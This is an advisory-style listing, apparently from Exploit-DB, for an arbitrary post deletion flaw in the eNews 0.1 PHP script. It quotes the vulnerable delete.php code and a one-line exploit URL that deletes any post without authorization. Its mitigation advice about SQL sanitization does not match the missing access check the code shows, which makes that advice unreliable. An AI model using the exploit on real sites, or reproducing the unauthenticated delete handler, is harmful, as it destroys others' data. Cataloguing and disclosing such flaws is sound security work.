eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability

vendor:

eNews 0.1

by:

iLker Kandemir [MEFISTO]

7.5

CVSS

HIGH

Arbitrary Delete Post Vulnerability

CWE

Product Name: eNews 0.1

Affected Version From: eNews 0.1

Affected Version To: eNews 0.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability

An attacker can delete any post from the eNews 0.1 application by sending a crafted HTTP request to the delete.php script with the id of the post to be deleted as a parameter.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in a SQL query.

Source

Exploit-DB raw data:

eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability


Author: iLker Kandemir [MEFISTO]

Script download : http://www.hotscripts.com/Detailed/81086.html

script demo : http://emvvy.com/demos/enews/

site : www.dumenci.net

----------------------------------------------------------------
//poc:

if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
  $deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
                       GetSQLValueString($_GET['delete'], "int"));

----------------------------------------------------------------

//exploit :

http://[site]/delete.php?delete=[eNews_id]

----------------------------------------------------------------

tnx : aLL my FriEndZ 

# milw0rm.com [2008-06-21]